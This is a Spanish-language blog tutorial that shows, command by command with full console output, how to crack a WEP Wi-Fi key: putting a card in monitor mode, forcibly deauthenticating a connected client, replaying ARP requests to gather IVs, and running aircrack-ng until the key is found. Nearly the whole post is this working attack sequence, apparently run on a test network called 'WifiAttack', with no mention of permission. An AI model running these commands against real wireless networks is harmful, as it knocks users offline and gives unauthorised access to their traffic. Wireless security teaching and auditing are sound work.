Seguridad y Redes

Tips, Video Tutoriales, Wifislax, VMware, Linux, GNS3, Eve-NG, CCNA, Cisco Routers, Switches

Ataque 0: Deauthentication + Ataque 3: ARP Packets Injection = Cracking WEP

By 20:46 , , , , , , , , , ,

En este post veremos como se obtiene la clave WEP de una red inalambrica con un cliente conectado. Para este escenario realizamos dos ataques. El primero sera el ataque 0 o bien la deautenticación que consiste en deautenticar al cliente conectado al Punto de Acceso. El segundo lanzaremos el Ataque 3: Reinyección de una petición ARP (ARP-request) para generar nuevos IVs (vectores de inicialización).

Lo primero es poner la tarjeta en modo monitor.

root@bt:~# airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
6179    dhclient

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
(monitor mode enabled on mon0)

root@bt:~#
Una vez puesto la tarjeta en modo monitor con airmon-ng. Ahora toca lanzar la herramienta airodump-ng buscar las redes wifi disponibles. Para esto tecleamos el siguiente comando en consola.

root@bt:~# airodump-ng mon0
CH  8 ][ Elapsed: 0 s ][ 2011-03-18 02:21

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:18:3F:18:85:C9    5        1        2    0   6  54 . WEP  WEP         WifiAttack

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

00:18:3F:18:85:C9  0C:60:76:71:D5:5B    1   54 -54      0        2

root@bt:~#
Como podemos ver tenemos una red disponible y también hay un cliente conectado a dicha red. Ahora lanzamos airodump-ng para que escuche todo el trafico de la red con el nombre de "WifiAttack".

root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0

Ataque 0: Deautenticación

Ahora toca lanzar el ataque 0 para deautenticar al cliente conectado a la red "WifiAttack". El cliente tiene la direccion MAC 0C:60:76:71:D5:5B. Para esto lanzamos el siguiente comando.

root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0
02:27:39  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
02:27:39  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [34|63 ACKs]
02:27:40  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [17|64 ACKs]
02:27:41  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:41  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:42  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:43  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [13|63 ACKs]
02:27:43  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [22|65 ACKs]
02:27:44  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [18|64 ACKs]
02:27:45  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [16|64 ACKs]
02:27:45  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [14|64 ACKs]
root@bt:~#
El numero 10 es el número de deautenticaciones a enviar. Una vez desasociado el cliente lanzamos el ataque 3 para generar nuevos IVs (vectores de inicialización).

Ataque 3: ARP-Request

Lanzamos el ataque 3 (ARP-request reinjection) de aireplay-ng para aumentar la velocidad de captura de los IVs (vectores de inicialización).

root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0
The interface MAC (00:C0:CA:4A:82:97) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 0C:60:76:71:D5:5B
02:28:07  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
Saving ARP requests in replay_arp-0318-022807.cap
You should also start airodump-ng to capture replies.
Read 81421 packets (got 27178 ARP requests and 26333 ACKs), sent 29719 packets...(49
root@bt:~#
Lo que sucede en este paso es, que areplay-ng escucha hasta encontrar un paquete ARP y cuando encuentra este paquete lo que hace es retransmitirlo hacia el punto de acceso, esto provoca que el AP tenga que repetir el paquete ARP con un IV nuevo y al retransmitir y retransmitir los paquetes ARP tendremos mas IVs que nos permitirán averiguar la clave WEP.

Cuando ya tengamos suficientes paquetes de datos (#Data) lanzamos aircrack-ng para crackear la Clave WEP. Abrimos consola y ejecutar aircrack-ng con el nombre del archivo guardado, en este caso es captura-01.cap

root@bt:~# aircrack-ng captura-01.cap
Opening captura-01.cap
Read 86840 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:18:85:C9  WifiAttack                WEP (19315 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 19477 ivs.

                                  Aircrack-ng 1.1 r1738

                     [00:00:00] Tested 4 keys (got 19189 IVs)

 KB    depth   byte(vote)
 0    0/  1    76(26624) 1E(26112) 4D(25088) E6(24576) A5(24064) 25(23808) 36(23808
 1    0/  2    53(26368) 78(26112) 92(24832) BD(24320) 1A(23808) 0B(23552) 59(23552
 2    0/  2    95(25856) C1(25856) 3E(25088) BB(24064) DD(24064) BF(23296) ED(23296
 3    0/  1    92(27392) 40(25088) 08(24576) 45(23808) 8F(23808) 20(23296) 97(23296
 4    0/  1    80(27392) F2(26112) 46(24832) 4D(24576) 71(24576) 0E(24320) 85(24064

                       KEY FOUND! [ 76:02:95:92:80 ]
       Decrypted correctly: 100%

, , , , , , , , , ,

About the Author

Hablaremos sobre redes, seguridad, Cisco IOS, Linux y emulacion de dispositivos en GNS3.

You Might Also Like

0 comentarios